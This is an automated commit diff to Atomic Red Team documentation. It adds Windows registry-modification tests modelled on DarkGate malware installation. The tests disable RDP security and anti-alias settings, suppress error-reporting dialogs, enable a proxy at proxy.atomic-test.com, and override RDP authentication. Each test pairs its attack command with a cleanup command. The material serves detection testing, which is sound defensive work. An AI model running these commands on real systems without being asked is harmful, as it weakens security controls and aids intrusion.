Generated docs from job=generate-docs branch=master [ci skip]

This commit is contained in:
Atomic Red Team doc generator
2023-12-07 02:56:57 +00:00
parent 8d8fdce249
commit d7c45a052d
9 changed files with 451 additions and 2 deletions
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
+6
View File
@@ -299,6 +299,12 @@ defense-evasion,T1112,Modify Registry,59,Modify Internet Zone Protocol Defaults
defense-evasion,T1112,Modify Registry,60,Activities To Disable Secondary Authentication Detected By Modified Registry Value.,c26fb85a-fa50-4fab-a64a-c51f5dc538d5,command_prompt
defense-evasion,T1112,Modify Registry,61,Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.,ffeddced-bb9f-49c6-97f0-3d07a509bf94,command_prompt
defense-evasion,T1112,Modify Registry,62,Scarab Ransomware Defense Evasion Activities,ca8ba39c-3c5a-459f-8e15-280aec65a910,command_prompt
defense-evasion,T1112,Modify Registry,63,Disable Remote Desktop Anti-Alias Setting Through Registry,61d35188-f113-4334-8245-8c6556d43909,command_prompt
defense-evasion,T1112,Modify Registry,64,Disable Remote Desktop Security Settings Through Registry,4b81bcfa-fb0a-45e9-90c2-e3efe5160140,command_prompt
defense-evasion,T1112,Modify Registry,65,Disabling ShowUI Settings of Windows Error Reporting (WER),09147b61-40f6-4b2a-b6fb-9e73a3437c96,command_prompt
defense-evasion,T1112,Modify Registry,66,Enable Proxy Settings,eb0ba433-63e5-4a8c-a9f0-27c4192e1336,command_prompt
defense-evasion,T1112,Modify Registry,67,Set-Up Proxy Server,d88a3d3b-d016-4939-a745-03638aafd21b,command_prompt
defense-evasion,T1112,Modify Registry,68,RDP Authentication Level Override,7e7b62e9-5f83-477d-8935-48600f38a3c6,command_prompt
defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
299 defense-evasion T1112 Modify Registry 60 Activities To Disable Secondary Authentication Detected By Modified Registry Value. c26fb85a-fa50-4fab-a64a-c51f5dc538d5 command_prompt
300 defense-evasion T1112 Modify Registry 61 Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value. ffeddced-bb9f-49c6-97f0-3d07a509bf94 command_prompt
301 defense-evasion T1112 Modify Registry 62 Scarab Ransomware Defense Evasion Activities ca8ba39c-3c5a-459f-8e15-280aec65a910 command_prompt
302 defense-evasion T1112 Modify Registry 63 Disable Remote Desktop Anti-Alias Setting Through Registry 61d35188-f113-4334-8245-8c6556d43909 command_prompt
303 defense-evasion T1112 Modify Registry 64 Disable Remote Desktop Security Settings Through Registry 4b81bcfa-fb0a-45e9-90c2-e3efe5160140 command_prompt
304 defense-evasion T1112 Modify Registry 65 Disabling ShowUI Settings of Windows Error Reporting (WER) 09147b61-40f6-4b2a-b6fb-9e73a3437c96 command_prompt
305 defense-evasion T1112 Modify Registry 66 Enable Proxy Settings eb0ba433-63e5-4a8c-a9f0-27c4192e1336 command_prompt
306 defense-evasion T1112 Modify Registry 67 Set-Up Proxy Server d88a3d3b-d016-4939-a745-03638aafd21b command_prompt
307 defense-evasion T1112 Modify Registry 68 RDP Authentication Level Override 7e7b62e9-5f83-477d-8935-48600f38a3c6 command_prompt
308 defense-evasion T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
309 defense-evasion T1027.001 Obfuscated Files or Information: Binary Padding 1 Pad Binary to Change Hash - Linux/macOS dd ffe2346c-abd5-4b45-a713-bf5f1ebd573a sh
310 defense-evasion T1027.001 Obfuscated Files or Information: Binary Padding 2 Pad Binary to Change Hash using truncate command - Linux/macOS e22a9e89-69c7-410f-a473-e6c212cd2292 sh
@@ -204,6 +204,12 @@ defense-evasion,T1112,Modify Registry,59,Modify Internet Zone Protocol Defaults
defense-evasion,T1112,Modify Registry,60,Activities To Disable Secondary Authentication Detected By Modified Registry Value.,c26fb85a-fa50-4fab-a64a-c51f5dc538d5,command_prompt
defense-evasion,T1112,Modify Registry,61,Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.,ffeddced-bb9f-49c6-97f0-3d07a509bf94,command_prompt
defense-evasion,T1112,Modify Registry,62,Scarab Ransomware Defense Evasion Activities,ca8ba39c-3c5a-459f-8e15-280aec65a910,command_prompt
defense-evasion,T1112,Modify Registry,63,Disable Remote Desktop Anti-Alias Setting Through Registry,61d35188-f113-4334-8245-8c6556d43909,command_prompt
defense-evasion,T1112,Modify Registry,64,Disable Remote Desktop Security Settings Through Registry,4b81bcfa-fb0a-45e9-90c2-e3efe5160140,command_prompt
defense-evasion,T1112,Modify Registry,65,Disabling ShowUI Settings of Windows Error Reporting (WER),09147b61-40f6-4b2a-b6fb-9e73a3437c96,command_prompt
defense-evasion,T1112,Modify Registry,66,Enable Proxy Settings,eb0ba433-63e5-4a8c-a9f0-27c4192e1336,command_prompt
defense-evasion,T1112,Modify Registry,67,Set-Up Proxy Server,d88a3d3b-d016-4939-a745-03638aafd21b,command_prompt
defense-evasion,T1112,Modify Registry,68,RDP Authentication Level Override,7e7b62e9-5f83-477d-8935-48600f38a3c6,command_prompt
defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
204 defense-evasion T1112 Modify Registry 60 Activities To Disable Secondary Authentication Detected By Modified Registry Value. c26fb85a-fa50-4fab-a64a-c51f5dc538d5 command_prompt
205 defense-evasion T1112 Modify Registry 61 Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value. ffeddced-bb9f-49c6-97f0-3d07a509bf94 command_prompt
206 defense-evasion T1112 Modify Registry 62 Scarab Ransomware Defense Evasion Activities ca8ba39c-3c5a-459f-8e15-280aec65a910 command_prompt
207 defense-evasion T1112 Modify Registry 63 Disable Remote Desktop Anti-Alias Setting Through Registry 61d35188-f113-4334-8245-8c6556d43909 command_prompt
208 defense-evasion T1112 Modify Registry 64 Disable Remote Desktop Security Settings Through Registry 4b81bcfa-fb0a-45e9-90c2-e3efe5160140 command_prompt
209 defense-evasion T1112 Modify Registry 65 Disabling ShowUI Settings of Windows Error Reporting (WER) 09147b61-40f6-4b2a-b6fb-9e73a3437c96 command_prompt
210 defense-evasion T1112 Modify Registry 66 Enable Proxy Settings eb0ba433-63e5-4a8c-a9f0-27c4192e1336 command_prompt
211 defense-evasion T1112 Modify Registry 67 Set-Up Proxy Server d88a3d3b-d016-4939-a745-03638aafd21b command_prompt
212 defense-evasion T1112 Modify Registry 68 RDP Authentication Level Override 7e7b62e9-5f83-477d-8935-48600f38a3c6 command_prompt
213 defense-evasion T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
214 defense-evasion T1484.001 Domain Policy Modification: Group Policy Modification 1 LockBit Black - Modify Group policy settings -cmd 9ab80952-74ee-43da-a98c-1e740a985f28 command_prompt
215 defense-evasion T1484.001 Domain Policy Modification: Group Policy Modification 2 LockBit Black - Modify Group policy settings -Powershell b51eae65-5441-4789-b8e8-64783c26c1d1 powershell
@@ -368,6 +368,12 @@
- Atomic Test #60: Activities To Disable Secondary Authentication Detected By Modified Registry Value. [windows]
- Atomic Test #61: Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value. [windows]
- Atomic Test #62: Scarab Ransomware Defense Evasion Activities [windows]
- Atomic Test #63: Disable Remote Desktop Anti-Alias Setting Through Registry [windows]
- Atomic Test #64: Disable Remote Desktop Security Settings Through Registry [windows]
- Atomic Test #65: Disabling ShowUI Settings of Windows Error Reporting (WER) [windows]
- Atomic Test #66: Enable Proxy Settings [windows]
- Atomic Test #67: Set-Up Proxy Server [windows]
- Atomic Test #68: RDP Authentication Level Override [windows]
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -259,6 +259,12 @@
- Atomic Test #60: Activities To Disable Secondary Authentication Detected By Modified Registry Value. [windows]
- Atomic Test #61: Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value. [windows]
- Atomic Test #62: Scarab Ransomware Defense Evasion Activities [windows]
- Atomic Test #63: Disable Remote Desktop Anti-Alias Setting Through Registry [windows]
- Atomic Test #64: Disable Remote Desktop Security Settings Through Registry [windows]
- Atomic Test #65: Disabling ShowUI Settings of Windows Error Reporting (WER) [windows]
- Atomic Test #66: Enable Proxy Settings [windows]
- Atomic Test #67: Set-Up Proxy Server [windows]
- Atomic Test #68: RDP Authentication Level Override [windows]
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- T1027.001 Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+110
View File
@@ -12974,6 +12974,116 @@ defense-evasion:
cleanup_command: 'reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters"
/v AllowEncryptionOracle /t REG_DWORD /d 0 /f
'
name: command_prompt
- name: Disable Remote Desktop Anti-Alias Setting Through Registry
auto_generated_guid: 61d35188-f113-4334-8245-8c6556d43909
description: 'A modification registry to disable RDP anti-alias settings. This
technique was seen in DarkGate malware as part of its installation
'
supported_platforms:
- windows
executor:
command: 'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows
NT\Terminal Services" /v "DisableRemoteDesktopAntiAlias" /t REG_DWORD /d
1 /f
'
cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows
NT\Terminal Services" /v "DisableRemoteDesktopAntiAlias" /t REG_DWORD /d
0 /f
'
name: command_prompt
- name: Disable Remote Desktop Security Settings Through Registry
auto_generated_guid: 4b81bcfa-fb0a-45e9-90c2-e3efe5160140
description: 'A modification registry to disable RDP security settings. This
technique was seen in DarkGate malware as part of its installation
'
supported_platforms:
- windows
executor:
command: 'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows
NT\Terminal Services" /v "DisableSecuritySettings" /t REG_DWORD /d 1 /f
'
cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows
NT\Terminal Services" /v "DisableSecuritySettings" /t REG_DWORD /d 0 /f
'
name: command_prompt
- name: Disabling ShowUI Settings of Windows Error Reporting (WER)
auto_generated_guid: '09147b61-40f6-4b2a-b6fb-9e73a3437c96'
description: "A modification registry to disable ShowUI settings of Windows
Error Report. This registry setting can influence the behavior of error reporting
dialogs or prompt box. \nThis technique was seen in DarkGate malware as part
of its installation.\n"
supported_platforms:
- windows
executor:
command: 'reg add "HKCU\Software\Microsoft\Windows\Windows Error Reporting"
/v DontShowUI /t REG_DWORD /d 1 /f
'
cleanup_command: 'reg add "HKCU\Software\Microsoft\Windows\Windows Error Reporting"
/v DontShowUI /t REG_DWORD /d 0 /f
'
name: command_prompt
- name: Enable Proxy Settings
auto_generated_guid: eb0ba433-63e5-4a8c-a9f0-27c4192e1336
description: 'A modification registry to enable proxy settings. This technique
was seen in DarkGate malware as part of its installation.
'
supported_platforms:
- windows
executor:
command: 'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
Settings" /v ProxyEnable /t REG_DWORD /d 1 /f
'
cleanup_command: 'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
Settings" /v ProxyEnable /t REG_DWORD /d 0 /f
'
name: command_prompt
- name: Set-Up Proxy Server
auto_generated_guid: d88a3d3b-d016-4939-a745-03638aafd21b
description: 'A modification registry to setup proxy server. This technique
was seen in DarkGate malware as part of its installation.
'
supported_platforms:
- windows
executor:
command: 'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
Settings" /v ProxyServer /t REG_SZ /d "proxy.atomic-test.com:8080" /f
'
cleanup_command: 'reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
Settings" /v ProxyServer
'
name: command_prompt
- name: RDP Authentication Level Override
auto_generated_guid: 7e7b62e9-5f83-477d-8935-48600f38a3c6
description: 'A modification registry to override RDP Authentication Level.
This technique was seen in DarkGate malware as part of its installation.
'
supported_platforms:
- windows
executor:
command: 'reg add "HKCU\Software\Microsoft\Terminal Server Client" /v AuthenticationLevelOverride
/t REG_DWORD /d 0 /f
'
cleanup_command: 'reg delete "HKCU\Software\Microsoft\Terminal Server Client"
/v AuthenticationLevelOverride
'
name: command_prompt
T1574.008:
+110
View File
@@ -10399,6 +10399,116 @@ defense-evasion:
cleanup_command: 'reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters"
/v AllowEncryptionOracle /t REG_DWORD /d 0 /f
'
name: command_prompt
- name: Disable Remote Desktop Anti-Alias Setting Through Registry
auto_generated_guid: 61d35188-f113-4334-8245-8c6556d43909
description: 'A modification registry to disable RDP anti-alias settings. This
technique was seen in DarkGate malware as part of its installation
'
supported_platforms:
- windows
executor:
command: 'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows
NT\Terminal Services" /v "DisableRemoteDesktopAntiAlias" /t REG_DWORD /d
1 /f
'
cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows
NT\Terminal Services" /v "DisableRemoteDesktopAntiAlias" /t REG_DWORD /d
0 /f
'
name: command_prompt
- name: Disable Remote Desktop Security Settings Through Registry
auto_generated_guid: 4b81bcfa-fb0a-45e9-90c2-e3efe5160140
description: 'A modification registry to disable RDP security settings. This
technique was seen in DarkGate malware as part of its installation
'
supported_platforms:
- windows
executor:
command: 'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows
NT\Terminal Services" /v "DisableSecuritySettings" /t REG_DWORD /d 1 /f
'
cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows
NT\Terminal Services" /v "DisableSecuritySettings" /t REG_DWORD /d 0 /f
'
name: command_prompt
- name: Disabling ShowUI Settings of Windows Error Reporting (WER)
auto_generated_guid: '09147b61-40f6-4b2a-b6fb-9e73a3437c96'
description: "A modification registry to disable ShowUI settings of Windows
Error Report. This registry setting can influence the behavior of error reporting
dialogs or prompt box. \nThis technique was seen in DarkGate malware as part
of its installation.\n"
supported_platforms:
- windows
executor:
command: 'reg add "HKCU\Software\Microsoft\Windows\Windows Error Reporting"
/v DontShowUI /t REG_DWORD /d 1 /f
'
cleanup_command: 'reg add "HKCU\Software\Microsoft\Windows\Windows Error Reporting"
/v DontShowUI /t REG_DWORD /d 0 /f
'
name: command_prompt
- name: Enable Proxy Settings
auto_generated_guid: eb0ba433-63e5-4a8c-a9f0-27c4192e1336
description: 'A modification registry to enable proxy settings. This technique
was seen in DarkGate malware as part of its installation.
'
supported_platforms:
- windows
executor:
command: 'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
Settings" /v ProxyEnable /t REG_DWORD /d 1 /f
'
cleanup_command: 'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
Settings" /v ProxyEnable /t REG_DWORD /d 0 /f
'
name: command_prompt
- name: Set-Up Proxy Server
auto_generated_guid: d88a3d3b-d016-4939-a745-03638aafd21b
description: 'A modification registry to setup proxy server. This technique
was seen in DarkGate malware as part of its installation.
'
supported_platforms:
- windows
executor:
command: 'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
Settings" /v ProxyServer /t REG_SZ /d "proxy.atomic-test.com:8080" /f
'
cleanup_command: 'reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
Settings" /v ProxyServer
'
name: command_prompt
- name: RDP Authentication Level Override
auto_generated_guid: 7e7b62e9-5f83-477d-8935-48600f38a3c6
description: 'A modification registry to override RDP Authentication Level.
This technique was seen in DarkGate malware as part of its installation.
'
supported_platforms:
- windows
executor:
command: 'reg add "HKCU\Software\Microsoft\Terminal Server Client" /v AuthenticationLevelOverride
/t REG_DWORD /d 0 /f
'
cleanup_command: 'reg delete "HKCU\Software\Microsoft\Terminal Server Client"
/v AuthenticationLevelOverride
'
name: command_prompt
T1574.008:
+205
View File
@@ -134,6 +134,18 @@ The Registry of a remote system may be modified to aid in execution of files as
- [Atomic Test #62 - Scarab Ransomware Defense Evasion Activities](#atomic-test-62---scarab-ransomware-defense-evasion-activities)
- [Atomic Test #63 - Disable Remote Desktop Anti-Alias Setting Through Registry](#atomic-test-63---disable-remote-desktop-anti-alias-setting-through-registry)
- [Atomic Test #64 - Disable Remote Desktop Security Settings Through Registry](#atomic-test-64---disable-remote-desktop-security-settings-through-registry)
- [Atomic Test #65 - Disabling ShowUI Settings of Windows Error Reporting (WER)](#atomic-test-65---disabling-showui-settings-of-windows-error-reporting-wer)
- [Atomic Test #66 - Enable Proxy Settings](#atomic-test-66---enable-proxy-settings)
- [Atomic Test #67 - Set-Up Proxy Server](#atomic-test-67---set-up-proxy-server)
- [Atomic Test #68 - RDP Authentication Level Override](#atomic-test-68---rdp-authentication-level-override)
<br/>
@@ -2303,4 +2315,197 @@ reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\
<br/>
<br/>
## Atomic Test #63 - Disable Remote Desktop Anti-Alias Setting Through Registry
A modification registry to disable RDP anti-alias settings. This technique was seen in DarkGate malware as part of its installation
**Supported Platforms:** Windows
**auto_generated_guid:** 61d35188-f113-4334-8245-8c6556d43909
#### Attack Commands: Run with `command_prompt`!
```cmd
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableRemoteDesktopAntiAlias" /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableRemoteDesktopAntiAlias" /t REG_DWORD /d 0 /f
```
<br/>
<br/>
## Atomic Test #64 - Disable Remote Desktop Security Settings Through Registry
A modification registry to disable RDP security settings. This technique was seen in DarkGate malware as part of its installation
**Supported Platforms:** Windows
**auto_generated_guid:** 4b81bcfa-fb0a-45e9-90c2-e3efe5160140
#### Attack Commands: Run with `command_prompt`!
```cmd
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableSecuritySettings" /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableSecuritySettings" /t REG_DWORD /d 0 /f
```
<br/>
<br/>
## Atomic Test #65 - Disabling ShowUI Settings of Windows Error Reporting (WER)
A modification registry to disable ShowUI settings of Windows Error Report. This registry setting can influence the behavior of error reporting dialogs or prompt box.
This technique was seen in DarkGate malware as part of its installation.
**Supported Platforms:** Windows
**auto_generated_guid:** 09147b61-40f6-4b2a-b6fb-9e73a3437c96
#### Attack Commands: Run with `command_prompt`!
```cmd
reg add "HKCU\Software\Microsoft\Windows\Windows Error Reporting" /v DontShowUI /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg add "HKCU\Software\Microsoft\Windows\Windows Error Reporting" /v DontShowUI /t REG_DWORD /d 0 /f
```
<br/>
<br/>
## Atomic Test #66 - Enable Proxy Settings
A modification registry to enable proxy settings. This technique was seen in DarkGate malware as part of its installation.
**Supported Platforms:** Windows
**auto_generated_guid:** eb0ba433-63e5-4a8c-a9f0-27c4192e1336
#### Attack Commands: Run with `command_prompt`!
```cmd
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 0 /f
```
<br/>
<br/>
## Atomic Test #67 - Set-Up Proxy Server
A modification registry to setup proxy server. This technique was seen in DarkGate malware as part of its installation.
**Supported Platforms:** Windows
**auto_generated_guid:** d88a3d3b-d016-4939-a745-03638aafd21b
#### Attack Commands: Run with `command_prompt`!
```cmd
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /t REG_SZ /d "proxy.atomic-test.com:8080" /f
```
#### Cleanup Commands:
```cmd
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer
```
<br/>
<br/>
## Atomic Test #68 - RDP Authentication Level Override
A modification registry to override RDP Authentication Level. This technique was seen in DarkGate malware as part of its installation.
**Supported Platforms:** Windows
**auto_generated_guid:** 7e7b62e9-5f83-477d-8935-48600f38a3c6
#### Attack Commands: Run with `command_prompt`!
```cmd
reg add "HKCU\Software\Microsoft\Terminal Server Client" /v AuthenticationLevelOverride /t REG_DWORD /d 0 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKCU\Software\Microsoft\Terminal Server Client" /v AuthenticationLevelOverride
```
<br/>